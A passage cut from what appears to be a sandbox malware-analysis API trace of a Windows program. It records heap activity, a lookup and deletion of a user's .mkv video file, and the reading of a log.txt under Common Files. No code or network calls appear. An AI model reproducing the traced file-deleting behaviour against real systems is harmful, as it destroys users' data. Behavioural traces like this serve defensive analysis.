hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0194.700] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0194.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0194.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0194.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0194.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0194.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0194.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0194.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0194.701] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv", lpFilePart=0x0) returned 0x5f [0194.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3478 [0194.701] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\4us08vsplrh ofh79jeb.mkv")) returned 0x20 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0194.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0194.701] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0194.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0194.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0194.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0194.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0194.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0194.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0194.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0194.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0194.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0194.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0194.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0194.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0194.702] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0194.702] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f5e8260, ftCreationTime.dwHighDateTime=0x1d5dd9d, ftLastAccessTime.dwLowDateTime=0x7011bde0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0x19401940, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xf4b5, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="4Us08VSplrH Ofh79JeB.mkv", cAlternateFileName="4US08V~1.MKV")) returned 0x90ae18 [0194.702] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\4Us08VSplrH Ofh79JeB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\4us08vsplrh ofh79jeb.mkv")) returned 1 [0194.705] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3f5e8260, ftCreationTime.dwHighDateTime=0x1d5dd9d, ftLastAccessTime.dwLowDateTime=0x7011bde0, ftLastAccessTime.dwHighDateTime=0x1d5e2d5, ftLastWriteTime.dwLowDateTime=0x19401940, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xf4b5, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="4Us08VSplrH Ofh79JeB.mkv", cAlternateFileName="4US08V~1.MKV")) returned 0 [0194.705] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0194.707] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.707] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0194.708] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0194.709] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0194.709] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0194.709] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a00 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0194.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba498 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0194.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0194.710] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0194.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0194.710] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.710] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0194.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0194.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0194.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0194.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0194.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.711] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0194.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0194.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0194.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0194.711] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0194.711] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.711] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0194.711] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0194.712] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0194.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0194.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0194.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0194.712] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0194.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0194.712] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0194.712] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0194.712] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.712] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0194.712] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.713] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0194.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0194.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0194.713] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0194.713] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0194.713] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x36bd, lpOverlapped=0x0) returned 1 [0194.713] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0194.713] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x36bd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.713] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0194.713] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.713] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.713] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0194.713] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0194.714] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0194.714] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0194.714] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0194.714] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 